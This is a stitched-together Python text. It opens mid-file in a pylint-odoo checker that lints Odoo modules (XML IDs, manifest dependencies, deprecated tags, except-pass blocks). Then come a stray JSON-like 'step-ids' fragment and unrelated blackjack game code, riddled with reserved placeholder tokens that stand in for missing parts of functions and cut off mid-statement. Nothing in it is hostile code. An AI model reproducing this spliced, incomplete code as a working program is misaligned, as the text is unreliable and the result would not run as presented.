'dangerous-view-replace-wo-priority',\n settings.DESC_DFLT\n ),\n 'W%d30' % settings.BASE_OMODULE_ID: (\n '%s not used from manifest',\n 'file-not-used',\n settings.DESC_DFLT\n ),\n 'W%d35' % settings.BASE_OMODULE_ID: (\n 'External dependency \"%s\" without ImportError. More info: '\n 'https://odoo-development.readthedocs.io/en/latest/dev/py/external-imports.html'\n '#external-dependencies',\n 'missing-import-error',\n settings.DESC_DFLT\n ),\n 'W%d36' % settings.BASE_OMODULE_ID: (\n 'Missing external dependency \"%s\" from manifest. More info: '\n 'https://github.com/OCA/odoo-community.org/blob/master/website/'\n 'Contribution/CONTRIBUTING.rst'\n '#external-dependencies',\n 'missing-manifest-dependency',\n settings.DESC_DFLT\n ),\n 'W%d38' % settings.BASE_OMODULE_ID: (\n 'pass into block except. '\n 'If you really need to use the pass consider logging that exception',\n 'except-pass',\n settings.DESC_DFLT\n ),\n 'W%d37' % settings.BASE_OMODULE_ID: (\n '%s The xml attribute is missing the translation=\"off\" tag %s',\n 'xml-attribute-translatable',\n settings.DESC_DFLT\n ),\n 'W%d42' % settings.BASE_OMODULE_ID: (\n '%s Deprecated <tree> xml attribute \"%s\"',\n 'xml-deprecated-tree-attribute',\n settings.DESC_DFLT\n ),\n 'W%d43' % settings.BASE_OMODULE_ID: (\n '%s Deprecated QWeb directive \"%s\". Use \"t-options\" instead',\n 'xml-deprecated-qweb-directive',\n settings.DESC_DFLT\n ),\n 'W%d39' % settings.BASE_OMODULE_ID: (\n '%s Use <odoo> instead of <odoo><data> or use <odoo noupdate=\"1\">'\n 'instead of <odoo><data noupdate=\"1\">',\n 'deprecated-data-xml-node',\n settings.DESC_DFLT\n ),\n 'W%d44' % settings.BASE_OMODULE_ID: (\n '%s The resource in in src/href contains a not valid chararter',\n 'character-not-valid-in-resource-link',\n settings.DESC_DFLT\n ),\n}\n\n\nDFTL_README_TMPL_URL = 'https://github.com/OCA/maintainer-tools' + \\\n '/blob/master/template/module/README.rst'\nDFTL_README_FILES = ['README.rst', 'README.md', 'README.txt']\nDFTL_MIN_PRIORITY = 99\n# Files supported from manifest to convert\n# Extracted from openerp/tools/convert.py:def convert_file\nDFLT_EXTFILES_CONVERT = ['csv', 'sql', 'xml', 'yml']\nDFLT_EXTFILES_TO_LINT = DFLT_EXTFILES_CONVERT + [\n 'po', 'js', 'mako', 'rst', 'md', 'markdown']\nDFLT_IMPORT_NAME_WHITELIST = [\n # self-odoo\n 'odoo', 'openerp',\n # packages for unit tests only\n 'requests_mock',\n # Known external packages of odoo\n 'PIL', 'anybox.testing.openerp', 'argparse', 'babel',\n 'dateutil', 'decorator', 'docutils', 'faces', 'feedparser',\n 'gdata', 'gevent', 'greenlet', 'jcconv', 'jinja2',\n 'ldap', 'lxml', 'mako', 'markupsafe', 'mock', 'odf',\n 'ofxparse', 'openid', 'passlib', 'pkg_resources',\n 'psutil', 'psycogreen', 'psycopg2', 'pyPdf', 'pychart',\n 'pydot', 'pyparsing', 'pytz', 'qrcode', 'reportlab',\n 'requests', 'serial', 'simplejson', 'six', 'suds',\n 'unittest2', 'usb', 'vatnumber', 'vobject', 'werkzeug',\n 'wsgiref', 'xlsxwriter', 'xlwt', 'yaml',\n]\nDFTL_JSLINTRC = os.path.join(\n os.path.dirname(os.path.dirname(os.path.realpath(__file__))),\n 'examples', '.jslintrc'\n)\nDFLT_DEPRECATED_TREE_ATTRS = ['colors', 'fonts', 'string']\nDFTL_MANIFEST_DATA_KEYS = ['data', 'demo', 'demo_xml', 'init_xml', 'test',\n 'update_xml']\n\n\nclass ModuleChecker(misc.WrapperModuleChecker):\n name = settings.CFG_SECTION\n msgs = ODOO_MSGS\n options = (\n ('readme_template_url', {\n 'type': 'string',\n 'metavar': '<string>',\n 'default': DFTL_README_TMPL_URL,\n 'help': 'URL of README.rst template file',\n }),\n ('extfiles_to_lint', {\n 'type': 'csv',\n 'metavar': '<comma separated values>',\n 'default': DFLT_EXTFILES_TO_LINT,\n 'help': 'List of extension files to check separated by a comma.'\n }),\n ('min-priority', {\n 'type': 'int',\n 'metavar': '<int>',\n 'default': DFTL_MIN_PRIORITY,\n 'help': 'Minimum priority number of a view with replace of fields.'\n }),\n ('extfiles_convert', {\n 'type': 'csv',\n 'metavar': '<comma separated values>',\n 'default': DFLT_EXTFILES_CONVERT,\n 'help': 'List of extension files supported to convert '\n 'from manifest separated by a comma.'\n }),\n ('import_name_whitelist', {\n 'type': 'csv',\n 'metavar': '<comma separated values>',\n 'default': DFLT_IMPORT_NAME_WHITELIST,\n 'help': 'List of known import dependencies of odoo,'\n ' separated by a comma.'\n }),\n ('jslintrc', {\n 'type': 'string',\n 'metavar': '<path to file>',\n 'default': os.environ.get('PYLINT_ODOO_JSLINTRC') or DFTL_JSLINTRC,\n 'help': ('A path to a file that contains a configuration file of '\n 'javascript lint. You can use the environment variable '\n '\"PYLINT_ODOO_JSLINTRC\" too. Default: %s' % DFTL_JSLINTRC)\n }),\n ('deprecated_tree_attributes', {\n 'type': 'multiple_choice',\n 'metavar': '<attributes>',\n 'default': DFLT_DEPRECATED_TREE_ATTRS,\n 'choices': DFLT_DEPRECATED_TREE_ATTRS,\n 'help': 'List of deprecated list view attributes,'\n ' separated by a comma. Valid values: %s' % ', '.join(\n DFLT_DEPRECATED_TREE_ATTRS)\n }),\n )\n\n odoo_check_versions = {\n 'missing-import-error': {\n 'max_odoo_version': '11.0',\n },\n }\n\n class_inherit_names = []\n\n @utils.check_messages('consider-merging-classes-inherited')\n def visit_assign(self, node):\n if not self.odoo_node:\n return\n if not self.linter.is_message_enabled(\n 'consider-merging-classes-inherited', node.lineno):\n return\n node_left = node.targets[0]\n if not isinstance(node_left, astroid.node_classes.AssignName) or \\\n node_left.name not in ('_inherit', '_name') or \\\n not isinstance(node.value, astroid.node_classes.Const) or \\\n not isinstance(node.parent, astroid.ClassDef):\n return\n if node_left.name == '_name':\n node.parent.odoo_attribute_name = node.value.value\n return\n _name = getattr(node.parent, 'odoo_attribute_name', None)\n _inherit = node.value.value\n if _name and _name != _inherit:\n # Skip _name='model.name' _inherit='other.model' because is valid\n return\n key = (self.odoo_node, _inherit)\n node.file = self.linter.current_file\n self.inh_dup.setdefault(key, []).append(node)\n\n def _build_whitelist_module_patterns(self):\n known_patterns = []\n for known_pattern in self.config.import_name_whitelist:\n pattern = known_pattern.replace('*', '.*').replace('?', '.?')\n known_patterns.append(re.compile('^' + pattern + '$'))\n return known_patterns\n\n def open(self):\n \"\"\"Define variables to use cache\"\"\"\n self.inh_dup = {}\n patterns = self._build_whitelist_module_patterns()\n self._whitelist_module_patterns = patterns\n super(ModuleChecker, self).open()\n\n def close(self):\n \"\"\"Final process get all cached values and add messages\"\"\"\n for (odoo_node, class_dup_name), nodes in self.inh_dup.items():\n if len(nodes) == 1:\n continue\n path_nodes = []\n for node in nodes[1:]:\n relpath = os.path.relpath(node.file,\n os.path.dirname(odoo_node.file))\n path_nodes.append(\"%s:%d\" % (relpath, node.lineno))\n self.add_message('consider-merging-classes-inherited',\n node=nodes[0],\n args=(class_dup_name, ', '.join(path_nodes)))\n\n def _get_odoo_module_imported(self, node):\n odoo_module = []\n if isinstance(node, astroid.ImportFrom) and \\\n ('openerp.addons' in node.modname or\n 'odoo.addons' in node.modname):\n packages = node.modname.split('.')\n if len(packages) >= 3:\n # from openerp.addons.odoo_module import models\n odoo_module.append(packages[2])\n else:\n # from openerp.addons import odoo_module\n odoo_module.append(node.names[0][0])\n elif isinstance(node, astroid.Import):\n for name, _ in node.names:\n if 'openerp.addons' not in name and 'odoo.addons' not in name:\n continue\n packages = name.split('.')\n if len(packages) >= 3:\n # import openerp.addons.odoo_module\n odoo_module.append(packages[2])\n return odoo_module\n\n def check_odoo_relative_import(self, node):\n if self.odoo_module_name in self._get_odoo_module_imported(node):\n self.add_message('odoo-addons-relative-import', node=node,\n args=(self.odoo_module_name))\n\n @staticmethod\n def _is_absolute_import(node, name):\n modnode = node.root()\n importedmodnode = ModuleChecker._get_imported_module(node, name)\n if importedmodnode and importedmodnode.file and \\\n modnode is not importedmodnode and \\\n importedmodnode.name != name:\n return True\n return False\n\n @staticmethod\n def _get_imported_module(importnode, modname):\n try:\n return importnode.do_import_module(modname)\n except:\n pass\n\n def _is_module_name_in_whitelist(self, module_name):\n # Try to find most specific placement instruction match (if any)\n # (from isort place_module() method)\n parts = module_name.split('.')\n module_names_to_check = [\n '.'.join(parts[:first_k])\n for first_k in range(len(parts), 0, -1)\n ]\n # Check if one of the module name is part of the whitelist.\n # For an module name such as 'anybox.testing.openerp', the\n # modules names to check will be:\n # ['anybox.testing.openerp', 'anybox.testing', 'anybox']\n # Only one of them has to be in the whitelist to be accepted.\n for module_name_to_check in module_names_to_check:\n for pattern in self._whitelist_module_patterns:\n if pattern.match(module_name_to_check):\n return True\n return False\n\n def _check_imported_packages(self, node, module_name):\n \"\"\"Check if the import node is a external dependency to validate it\"\"\"\n if not module_name:\n # skip local packages because is not a external dependency.\n return\n if not self.manifest_dict:\n # skip if is not a module of odoo\n return\n if not isinstance(node.parent, astroid.Module):\n # skip nested import sentences\n return\n if self._is_absolute_import(node, module_name):\n # skip absolute imports\n return\n if self._is_module_name_in_whitelist(module_name):\n # ignore whitelisted modules\n return\n isort_obj = isort.SortImports(file_contents='')\n import_category = isort_obj.place_module(module_name)\n if import_category not in ('FIRSTPARTY', 'THIRDPARTY'):\n # skip if is not a external library or is a white list library\n return\n relpath = os.path.relpath(\n node.parent.file, os.path.dirname(self.manifest_file))\n if os.path.dirname(relpath) == 'tests':\n # import errors rules don't apply to the test files\n # since these files are loaded only when running tests\n # and in such a case your\n # module and their external dependencies are installed.\n return\n self.add_message('missing-import-error', node=node,\n args=(module_name,))\n\n ext_deps = self.manifest_dict.get('external_dependencies') or {}\n py_ext_deps = ext_deps.get('python') or []\n if isinstance(node, astroid.ImportFrom) and (node.level or 0) >= 1:\n return\n if module_name not in py_ext_deps and \\\n module_name.split('.')[0] not in py_ext_deps:\n self.add_message('missing-manifest-dependency', node=node,\n args=(module_name,))\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error',\n 'missing-manifest-dependency')\n def visit_importfrom(self, node):\n self.check_odoo_relative_import(node)\n if isinstance(node.scope(), astroid.Module):\n package = node.modname\n self._check_imported_packages(node, package)\n\n @utils.check_messages('odoo-addons-relative-import',\n 'missing-import-error',\n 'missing-manifest-dependency')\n def visit_import(self, node):\n self.check_odoo_relative_import(node)\n for name, _ in node.names:\n if isinstance(node.scope(), astroid.Module):\n self._check_imported_packages(node, name)\n\n @utils.check_messages('except-pass')\n def visit_tryexcept(self, node):\n \"\"\"Visit block try except\"\"\"\n for handler in node.handlers:\n if (not handler.name and\n len(handler.body) == 1 and\n isinstance(handler.body[0], astroid.node_classes.Pass)):\n self.add_message('except-pass', node=handler)\n\n def _check_rst_syntax_error(self):\n \"\"\"Check if rst file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n rst_files = self.filter_files_ext('rst')\n self.msg_args = []\n for rst_file in rst_files:\n errors = self.check_rst_syntax(\n os.path.join(self.module_path, rst_file))\n for error in errors:\n msg = error.full_message\n res = re.search(\n r'No directive entry for \"([\\w|\\-]+)\"|'\n r'Unknown directive type \"([\\w|\\-]+)\"|'\n r'No role entry for \"([\\w|\\-]+)\"|'\n r'Unknown interpreted text role \"([\\w|\\-]+)\"', msg)\n # TODO: Add support for sphinx directives after fix\n # https://github.com/twolfson/restructuredtext-lint/issues/29\n if res:\n # Skip directive errors\n continue\n self.msg_args.append((\n \"%s:%d\" % (rst_file, error.line or 0),\n msg.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_readme(self):\n \"\"\"Check if exists ./README.{rst,md,txt} file\n :return: If exists return True else False\n \"\"\"\n self.msg_args = (self.config.readme_template_url,)\n for readme in DFTL_README_FILES:\n if os.path.isfile(os.path.join(self.module_path, readme)):\n return True\n return False\n\n def _check_xml_syntax_error(self):\n \"\"\"Check if xml file there is syntax error\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n result = self.parse_xml(os.path.join(self.module_path, xml_file))\n if isinstance(result, string_types):\n self.msg_args.append((\n xml_file, result.strip('\\n').replace('\\n', '|')))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_record_id(self, records):\n \"\"\"Get duplicated records based on attribute id\n :param records list: List of lxml.etree.Element \"<record\"\n :return: Duplicated items.\n e.g. {record.id: [record_node1, record_node2]}\n :rtype: dict\n \"\"\"\n all_records = {}\n for record in records:\n record_id = \"%s/%s_noupdate_%s\" % (\n record.attrib.get('section', ''),\n record.attrib.get('id', ''),\n record.getparent().attrib.get('noupdate', '0'),\n )\n all_records.setdefault(record_id, []).append(record)\n # Remove all keys which not duplicated\n records = {}\n for key, items in all_records.items():\n if not len(items) < 2:\n records[key] = items\n return records\n\n def _check_duplicate_xml_record_id(self):\n \"\"\"Check duplicated XML-IDs inside of the files of\n each manifest-section treated them separately\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_records = []\n for fname, section in self._get_manifest_referenced_files().items():\n if os.path.splitext(fname)[1].lower() != '.xml':\n continue\n fname = os.path.join(self.module_path, fname)\n for xml_record in self.get_xml_records(fname):\n xml_record.attrib['section'] = section\n xml_records.append(xml_record)\n for name, fobjs in \\\n self._get_duplicate_xml_record_id(xml_records).items():\n self.msg_args.append((\n \"%s:%d\" % (os.path.relpath(fobjs[0].base, self.module_path),\n fobjs[0].sourceline),\n name,\n ', '.join([os.path.relpath(fobj.base, self.module_path) +\n ':' + str(fobj.sourceline)\n for fobj in fobjs[1:]]),\n ))\n if self.msg_args:\n return False\n return True\n\n def _check_duplicate_id_csv(self):\n \"\"\"Check duplicate xml id in ir.model.access.csv files of a odoo module.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n all_csv_ids = []\n self.msg_args = []\n for csv_file_rel in self.filter_files_ext('csv', relpath=True):\n csv_file = os.path.join(self.module_path, csv_file_rel)\n if os.path.basename(csv_file) == 'ir.model.access.csv':\n all_csv_ids.extend(self.get_field_csv(csv_file))\n duplicated_ids_csv = self.get_duplicated_items(all_csv_ids)\n for duplicated_id_csv in duplicated_ids_csv:\n self.msg_args.append((csv_file_rel, duplicated_id_csv))\n if duplicated_ids_csv:\n return False\n return True\n\n def _check_redundant_modulename_xml(self):\n \"\"\"Check redundant module name in xml file.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file_rel in self.filter_files_ext('xml', relpath=True):\n xml_file = os.path.join(self.module_path, xml_file_rel)\n for xml_id, lineno in self.get_xml_redundant_module_name(\n xml_file, self.module):\n self.msg_args.append(\n (\"%s:%d\" % (xml_file_rel, lineno), xml_id))\n if self.msg_args:\n return False\n return True\n\n def _check_character_not_valid_in_resource_link(self):\n \"\"\"The resource in in src/href contains a not valid chararter\"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml'):\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n for name, attr in (('link', 'href'), ('script', 'src')):\n nodes = (doc.xpath('.//%s[@%s]' % (name, attr))\n if not isinstance(doc, string_types) else [])\n for node in nodes:\n resource = node.get(attr, '')\n ext = os.path.splitext(os.path.basename(resource))[1]\n if (resource.startswith('/') and not\n re.search('^[.][a-zA-Z]+$', ext)):\n self.msg_args.append((\"%s:%s\" % (xml_file,\n node.sourceline)))\n if self.msg_args:\n return False\n return True\n\n def _get_duplicate_xml_fields(self, fields):\n \"\"\"Get duplicated xml fields based on attribute name\n :param fields list: List of lxml.etree.Element \"<field\"\n :return: Duplicated items.\n e.g. {field.name: [field_node1, field_node2]}\n :rtype: dict\n \"\"\"\n all_fields = {}\n for field in fields:\n field_xml = field.attrib.get('name')\n if not field_xml:\n continue\n all_fields.setdefault(\n (field_xml, field.attrib.get('context'),\n field.attrib.get('filter_domain'),\n field.getparent()), []).append(field)\n # Remove all keys which not duplicated by excluding them from the\n return dict(((name, context, filter_domain, parent_node), nodes) for\n (name, context, filter_domain, parent_node), nodes in\n all_fields.items() if len(nodes) >= 2)\n\n def _check_duplicate_xml_fields(self):\n \"\"\"Check duplicate field in all record of xml files of a odoo module.\n Important note: this check does not work with inherited views.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(\n os.path.join(self.module_path, xml_file)):\n if record.xpath('field[@name=\"inherit_id\"]'):\n continue\n for xpath in ['field', 'field/*/field',\n 'field/*/field/tree/field',\n 'field/*/field/form/field']:\n for name, fobjs in self._get_duplicate_xml_fields(\n record.xpath(xpath)).items():\n self.msg_args.append((\n \"%s:%d\" % (xml_file, fobjs[0].sourceline), name[0],\n ', '.join([str(fobj.sourceline)\n for fobj in fobjs[1:]]),\n ))\n if self.msg_args:\n return False\n return True\n\n def _check_dangerous_filter_wo_user(self):\n \"\"\"Check dangerous filter without a user assigned.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n ir_filter_records = self.get_xml_records(\n os.path.join(self.module_path, xml_file), model='ir.filters')\n for ir_filter_record in ir_filter_records:\n ir_filter_fields = ir_filter_record.xpath(\n \"field[@name='name' or @name='user_id']\")\n # if exists field=\"name\" then is a new record\n # then should be field=\"user_id\" too\n if ir_filter_fields and len(ir_filter_fields) == 1:\n # TODO: Add a list of msg_args before of return\n # TODO: Add source lineno in all xml checks\n self.msg_args = (\n \"%s:%d\" % (xml_file, ir_filter_record.sourceline),\n ir_filter_record.get('id'),)\n return False\n return True\n\n @staticmethod\n def _get_priority(view):\n try:\n priority_node = view.xpath(\"field[@name='priority'][1]\")[0]\n return int(priority_node.get('eval', priority_node.text) or 0)\n except (IndexError, ValueError):\n # IndexError: If the field is not found\n # ValueError: If the value found is not valid integer\n pass\n return 0\n\n @staticmethod\n def _is_replaced_field(view):\n try:\n arch = view.xpath(\"field[@name='arch' and @type='xml'][1]\")[0]\n except IndexError:\n return None\n replaces = \\\n arch.xpath(\".//field[@name='name' and @position='replace'][1]\") + \\\n arch.xpath(\".//xpath[@position='replace'][1]\")\n return bool(replaces)\n\n def _check_dangerous_view_replace_wo_priority(self):\n \"\"\"Check dangerous view defined with low priority\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n views = self.get_xml_records(\n os.path.join(self.module_path, xml_file), model='ir.ui.view')\n for view in views:\n priority = self._get_priority(view)\n is_replaced_field = self._is_replaced_field(view)\n if is_replaced_field and priority < self.config.min_priority:\n self.msg_args.append((\n \"%s:%s\" % (xml_file, view.sourceline), priority,\n self.config.min_priority))\n if self.msg_args:\n return False\n return True\n\n def _check_create_user_wo_reset_password(self):\n \"\"\"Check xml records of user without the context\n 'context=\"{'no_reset_password': True}\"'\n This context avoid send email and mail log warning\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n xml_files = self.filter_files_ext('xml')\n for xml_file in xml_files:\n user_records = self.get_xml_records(\n os.path.join(self.module_path, xml_file), model='res.users')\n # if exists field=\"name\" then is a new record\n # then should be context\n self.msg_args.extend([\n (\"%s:%s\" % (xml_file, user_record.sourceline))\n for user_record in user_records\n if user_record.xpath(\"field[@name='name']\") and\n 'no_reset_password' not in (user_record.get('context') or '')])\n if self.msg_args:\n return False\n return True\n\n def _check_javascript_lint(self):\n \"\"\"Check javascript lint\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for js_file_rel in self.filter_files_ext('js', relpath=True):\n js_file = os.path.join(self.module_path, js_file_rel)\n errors = self.check_js_lint(js_file, self.config.jslintrc)\n for error in errors:\n self.msg_args.append((js_file_rel + error,))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_data_xml_node(self):\n \"\"\"Check deprecated <data> xml node inside <odoo> xml node\n :return: False if found <data> xml node inside <odoo> xml node\"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n odoo_nodes = doc.xpath(\"/odoo\") \\\n if not isinstance(doc, string_types) else []\n children, data_node = ((odoo_nodes[0].getchildren(),\n odoo_nodes[0].findall('data'))\n if odoo_nodes else ([], []))\n if len(children) == 1 and len(data_node) == 1:\n lineno = odoo_nodes[0].sourceline\n self.msg_args.append((\"%s:%s\" % (xml_file, lineno)))\n if self.msg_args:\n return False\n return True\n\n def _check_deprecated_openerp_xml_node(self):\n \"\"\"Check deprecated <openerp> xml node\n :return: False if exists <openerp> node and\n add list of xml files in self.msg_args\n \"\"\"\n xml_files = self.filter_files_ext('xml')\n self.msg_args = []\n for xml_file in xml_files:\n doc = self.parse_xml(os.path.join(self.module_path, xml_file))\n openerp_nodes = doc.xpath(\"/openerp\") \\\n if not isinstance(doc, string_types) else []\n if openerp_nodes:\n lineno = openerp_nodes[0].sourceline\n self.msg_args.append((\"%s:%s\" % (xml_file, lineno)))\n if self.msg_args:\n return False\n return True\n\n def _check_wrong_tabs_instead_of_spaces(self):\n \"\"\"Check wrong tabs character instead of four spaces.\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n countline = 0\n with open(ext_file, 'rb') as fp:\n for line in fp:\n countline += 1\n line_space_trip = line.lstrip(b' ')\n if line_space_trip != line_space_trip.lstrip(b'\\t'):\n self.msg_args.append(\n (\"%s:%d\" % (ext_file_rel, countline)))\n if self.msg_args:\n return False\n return True\n\n def _check_missing_newline_extrafiles(self):\n \"\"\"Check missing newline in other ext files (.xml, .csv, .po)\n :return: False if exists errors and\n add list of errors in self.msg_args\n \"\"\"\n self.msg_args = []\n for type_file in self.config.extfiles_to_lint:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n ext_file = os.path.join(self.module_path, ext_file_rel)\n last_line = ''\n # NOTE: SEEK_END just is supported with 'rb' mode for py3\n with open(ext_file, 'rb') as fp:\n if os.stat(ext_file).st_size > 1:\n fp.seek(-2, os.SEEK_END)\n last_line = fp.readline()\n if not (last_line.endswith(b'\\n') or\n last_line.endswith(b'\\r')):\n self.msg_args.append((ext_file_rel,))\n if self.msg_args:\n return False\n return True\n\n def _get_manifest_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in self.manifest_dict.get(data_type) or []:\n referenced_files[fname] = data_type\n return referenced_files\n\n def _get_xml_referenced_files(self):\n referenced_files = {}\n for data_type in DFTL_MANIFEST_DATA_KEYS:\n for fname in self.manifest_dict.get(data_type) or []:\n if not fname.endswith('.xml'):\n continue\n referenced_files.update(\n self._get_xml_referenced_files_report(fname, data_type)\n )\n return referenced_files\n\n def _get_xml_referenced_files_report(self, fname, data_type):\n return {\n # those files are relative to the addon path\n os.path.join(\n *record.attrib[attribute].split(os.sep)[1:]\n ): data_type\n for attribute in ['xml', 'xsl']\n for record in self.parse_xml(\n os.path.join(self.module_path, fname)\n )\n .xpath('//report[@%s]' % attribute)\n }\n\n def _get_module_files(self):\n module_files = []\n for type_file in self.config.extfiles_convert:\n for ext_file_rel in self.filter_files_ext(type_file, relpath=True):\n module_files.append(ext_file_rel)\n return module_files\n\n def _check_file_not_used(self):\n \"\"\"Check if a file is not used from manifest\"\"\"\n module_files = set(self._get_module_files())\n referenced_files = set(self._get_manifest_referenced_files()).union(\n set(self._get_xml_referenced_files())\n )\n excluded_dirs = ['static', 'test', 'tests', 'migrations']\n no_referenced_files = [\n f for f in (module_files - referenced_files)\n if f.split(os.path.sep)[0] not in excluded_dirs\n ]\n self.msg_args = no_referenced_files\n return not no_referenced_files\n\n def _check_xml_attribute_translatable(self):\n \"\"\"The xml attribute is missing the translation=\"off\" tag\n Example <attribute name=\"groups\">sale.group</attribute>\n \"\"\"\n if (self.linter._all_options['valid_odoo_versions'].config\n .valid_odoo_versions != ['8.0']):\n return True\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(\n os.path.join(self.module_path, xml_file), None,\n '//attribute[not(@name=\"string\") and not(@translation)]'):\n self.msg_args.append(\n (\"%s:%d\" % (xml_file, record.sourceline), 'xml_id'))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_tree_attribute(self):\n \"\"\"The tree-view declaration is using a deprecated attribute.\n Example <tree string=\"Partners\"></tree>\n \"\"\"\n checks = [\n {\n 'attr': 'colors',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},\n 'xpath': './/tree[@colors]',\n },\n {\n 'attr': 'fonts',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0', '8.0'},\n 'xpath': './/tree[@fonts]',\n },\n {\n 'attr': 'string',\n 'skip_versions': {'4.2', '5.0', '6.0', '6.1', '7.0'},\n 'xpath': './/tree[@string]',\n },\n ]\n valid_versions = set(\n self.linter._all_options['valid_odoo_versions'].config\n .valid_odoo_versions)\n\n applicable_checks = [check for check in checks if (\n check['attr'] in self.config.deprecated_tree_attributes and\n bool(valid_versions - check['skip_versions']))]\n\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=True):\n for record in self.get_xml_records(\n os.path.join(self.module_path, xml_file),\n model='ir.ui.view'):\n\n for check in applicable_checks:\n if record.xpath(check['xpath']):\n self.msg_args.append((\n '%s:%d' % (xml_file, record.sourceline),\n check['attr']))\n if self.msg_args:\n return False\n return True\n\n def _check_xml_deprecated_qweb_directive(self):\n \"\"\"Check for use of deprecated QWeb directives t-*-options.\n :return: False if deprecated directives are found, in which case\n self.msg_args will contain the error messages.\n \"\"\"\n valid_versions = set(self.linter._all_options[\n 'valid_odoo_versions'].config.valid_odoo_versions)\n if not valid_versions & {'10.0', '11.0'}:\n return True\n\n deprecated_directives = {\n 't-esc-options',\n 't-field-options',\n 't-raw-options',\n }\n directive_attrs = '|'.join('@%s' % d for d in deprecated_directives)\n xpath = '|'.join(\n '/%s//template//*[%s]' % (tag, directive_attrs)\n for tag in ('odoo', 'openerp')\n )\n\n self.msg_args = []\n for xml_file in self.filter_files_ext('xml', relpath=False):\n doc = self.parse_xml(xml_file)\n if isinstance(doc, string_types):\n continue\n for node in doc.xpath(xpath):\n # Find which directive was used exactly.\n directive = next(\n iter(set(node.attrib) & deprecated_directives))\n self.msg_args.append((\n '%s:%d' % (xml_file, node.sourceline), directive))\n return not bool(self.msg_args)\n",
"step-ids": [
24,
28,
33,
42,
46
]
}
|
[
24,
28,
33,
42,
46
] |
<|reserved_special_token_0|>
def create_players(num):
players_list = []
for i in range(num):
name = input(f'Player {i + 1}, what is your name? ')
while name == '':
name = input('Please enter your name: ')
players_list.append(people.Player(name, 1000))
print(
'\nAll players will begin the game with the same amount of $1,000 dollars.\n'
)
return players_list
<|reserved_special_token_0|>
def view_hands(players):
print('Here are the hands for each player: \n')
for p in players:
if isinstance(p, people.Dealer):
print(f'{p.name}: [{p.hand[0][0]}, ?]', end='')
print()
elif not p.check_broke():
print(f'{p.name}: {p.hand}', end='')
if p.check_blackjack():
print(f' ==> BLACKJACK!!! -- {p.name} wins ${p.bet}!')
else:
print()
print()
def do_decision(player, dealer, hand_index=0):
choices_dict = {'s': stand, 'h': hit, 'p': split, 'd': double_down}
valid_choice = False
while not valid_choice:
choice = input(
f'{player.name}, what do you want to do (s: stand, h: hit, p: split, d: double down): '
)
while choice.lower() not in choices_dict.keys():
choice = input(
"Please enter either 's', 'h', 'p', or 'd', corresponding to your choice: "
)
valid_choice = choices_dict.get(choice)(player, dealer, hand_index)
<|reserved_special_token_0|>
def split(player, dealer, hand_index=0):
if player.hand[hand_index][0] != player.hand[hand_index][1]:
print(
"You can't split on that hand! You need two identical cards to split. Choose again."
)
return False
elif player.bet * 2 > player.money:
print(
f"You don't have enough money to split with your current bet (${player.bet} * 2 = ${player.bet * 2})! Choose again."
)
return False
hands = [[player.hand[hand_index][0]], [player.hand[hand_index][1]]]
player.hand = hands
print('Now you will play each hand separately: \n')
for i in range(0, 2):
print(f'For Hand #{i + 1}: ')
do_decision(player, dealer, i)
return True
<|reserved_special_token_0|>
def reset(players):
dealer = players[-1]
for player in players:
dealer.retrieve_cards(player)
player.bet = 0
def display_accounts(players):
for player in players[:-1]:
change = player.money - player.initial_money
word = 'gain'
if change < 0:
word = 'loss'
print(
f""" {player.name}: ${player.money} (Chips: {player.chips}), net {word} of ${abs(change)}
"""
)
sys.stdout.flush()
time.sleep(0.5)
def disp_str_slow(phrase, t):
for i in phrase:
print(i, end='')
sys.stdout.flush()
time.sleep(t)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def display_instructions():
print(
"""
Instructions: The objective of this game is to obtain a hand of cards whose value is as close to 21 """
)
print(
'as possible without going over. The numbered cards have the value of their number, face cards have '
)
print(
"a value of 10 each, and the ace can either be counted as 1 or 11 (player's choice)\n"
)
print(
'Each round of the game begins with each player placing a bet. Then, the dealer passes out two cards to '
)
print(
"each player (up to 7 players) and to the dealer. The player's cards will be face up while one of the "
)
print(
"""dealer's cards will be face down. Then, each player will choose to either hit, stand, split, or double down:
"""
)
print(
" Hit: when a player 'hits,' he or she is dealt another card. A player can hit as many "
)
print(
' times as wanted, up until the player busts (goes over 21). \n'
)
print(
